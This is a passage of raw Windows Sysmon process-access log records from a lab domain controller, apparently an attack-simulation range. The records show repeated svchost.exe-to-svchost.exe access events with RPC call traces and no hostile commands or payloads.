ntdll.dll+51821 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.613{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 